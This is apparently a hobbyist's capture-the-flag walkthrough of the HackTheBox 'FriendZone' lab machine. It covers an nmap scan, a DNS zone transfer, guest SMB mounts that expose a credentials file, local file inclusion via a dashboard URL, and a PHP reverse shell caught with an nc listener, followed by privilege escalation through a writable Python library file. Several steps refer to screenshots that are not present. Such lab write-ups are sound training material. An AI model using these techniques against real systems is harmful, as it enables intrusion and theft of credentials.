FriendZone is an "Easy" difficulty Machine on hackthebox.eu
First Step: Nmap Scan of the Machine
nmap -n -v -Pn -p- -A --reason -oN fz.txt 10.10.10.123
Ubuntu, with a few things worth looking at
Primary areas of opportunity: FTP/21, HTTP/80, SMB/445
Interesting port: TCP/53
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.29
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
10.10.10.123 friendzone.htb
Checking to see if we can find anything with DNS since the port is apparently open, but nslookup shows nothing
Time to checkout something else.
Check the web browser first:
Nothing on the page worth mentioning, nothing in the source either.
Time to Check HTTPS :
I check the cert, and found the CN was set to friendzone.red
Nslookup still didnt give me anything good, but I was able to use the DNS Zone Transfer to find multiple hostnames used by this box.
Added 3 new entries into my /etc/hosts file
10.10.10.123 administrator1.friendzone.red
10.10.10.123 hr.friendzone.red
10.10.10.123 uploads.friendzone.red
10.10.10.123 friendzone.red
DNS Entry 1) https://friendzone.red, was just a gif of a dude trying desperately to escape the friendzone.
I was able to enumerate and find /admin
but was empty. So I think this is a dead end...
I busted an image folder, but no access without logging in first.
We'll revisit https://administrator1.friendzone.red for sure
DNS Entry 3) https://uploads.friendzone.red, an upload page! Here, I was thiking LFI for sure.
I uploaded the image, to verify what a working version of this looks like
So it says successful, and provides what looks like an epoch timestamp.
No matter what I did here was I able to determine where these were ending up. So, perhaps useful, but I'll just keep it in mind for later.
DNS Entry 4) hr.friendzone.red does nothing, definition of a dead end.
Time to see what other information we can find. Let's check
SMB/445
smbclient -L friendzone.htb
# Create a Directory for mapping the shares
mkdir sambas
# Access the folder
cd sambas
# Create 3 folders for their Network Mappings
mkdir Files
mkdir general
mkdir Development
#Attempt to Mount all 3 folders at the same time using the guest credentials
mount //10.10.10.123/Files ~/sambas/Files -o username=guest,password=''
mount //10.10.10.123/general ~/sambas/general -o username=guest,password=''
mount //10.10.10.123/Development ~/sambas/Development -o username=guest,password=''
I was able to map 2 of the 3 drives using the guest login!
We can see the two that accepted the connections are Development and general. In general we're able to find a file names 'cred.txt' with some credentials in it.
Another nice thing about doing the samba shares in this manner, for me anyway, is you can use the GUI and keep notes in an open notepad. Do what you prefer though!
/general folder
GUI:
CLI:
/Development folder
GUI:
CLI:
Let's try our login credentials on the administrator1.friendzone.red portal
URL:
https://administrator1.friendzone.red
Excellent, were in, and its leading us toward a dashboard!
The dashboard has even more instructions for us on how to use its URL Encoding
https://administrator1.friendzone.red/dashboard.php
So it brings up an image (that a.jpg and b.jpg work for), and pagename=timestamp.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
Of course we have to check and see if timestamp is a local php file, thats exactly what it is. So this will be where we hunt down our LFI Enumeration.
https://administrator1.friendzone.red/timestamp.php
Now, this is where I got pissed trying to figure out where to search for the folders for. Folks were rebooting the box like mad, sticking pagename=dashboard into the url above which im sure was killing the box, which im also guilty of see below...
So i stepped away and came back after about 2 weeks.
This helped as when I was reviewing my screenshots from my first dive in I noticed in the smbclient screenshot had a comment labeling the "Files" share as '/etc/Files'.
If you remember we had no access to this folder, so this may be nothing, but i moved forward with the assumption that /etc/general and /etc/Development (maybe /etc/Dev) were the folder locations for those shares.
I created a simple php file with <?php echo 'hello world'; ?> inside to test, and named it dbtn. and saved it in the /sambas/Development folder.
URL:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn
This script is consistently one of the best for php reverse shells
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
I updated the ip and ports in the reverse script, and uploaded it to the /sambas/Development folder
Now we set the Kali box to listen on port 9595
nc -v -n -l -p 9595
We then go back to our browser, and kick off the remote shell
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn_shell
After hunting around for a LONG time i found a database username and password
I was grepping "ps aux" to see what I could find for services.
I realize that because I spotted this I skipped a HUGE part the process here, but I did work my way back, after I got the root flag. That information will be at the bottom of this, and was a great to learn!
I found multiple os.py files which is worth noting
I looked into the os.py file the user was and found the following command at the end of the file:
I wasn't sure where the root flag was specifically, so I grabbed 3 locations I thought it might be (knowing full well the Desktop and Root werent even likely to exist)
Ok, so back to the piece I skipped... remember i spotted this guy editing the python file directly...
GitHub for the win!
I cloned the repo from github
git clone https://github.com/DominicBreuker/pspy
Started up my super basic web server
systemctl start apache2
Copied the python script into my web folder
wget http://10.10.x.x/pspy64
Ran into some permission issues
./pspy64
Fixed permissions, and it started checking for all running processes
chmod 777 pspy64 && ./pspy64
The output screamed for a few seconds before calming down, but within 2-3 minutes i saw the following
What I can't figure out how they determined they needed to edit the 2.7 file opposed to the any of the 3 python3 folders...
Dead Ends and Rabbit Holes
- https://friendzone.red,
- was just a gif of a dude trying desperately to escape the friendzone.
- /admin went nowhere
- FTP
- Never got in, and spent a while trying to identify any vulnerabilities to no avail.
- Wfuzz
- I love wfuzz... but ince this used to much SSL I wasnt able to use it, but blew a lot of time trying to figure out a way fuzz even if it was HTTPS.
- https://uploads.friendzone.red
- I assumed it was a broken script on the front end so I wasted a lot of time trying to fix the input object names. In the end the script on the backend (upload.php) literally doesn't do anything with the file. It just checks if there is one, then tells you it was successful.
- https://administrator1.friendzone.red/dashboard.php
- Finding the right folder to abuse LFI. In the end the answer was simple... and if I spent time looking for clues too it would have been faster.
All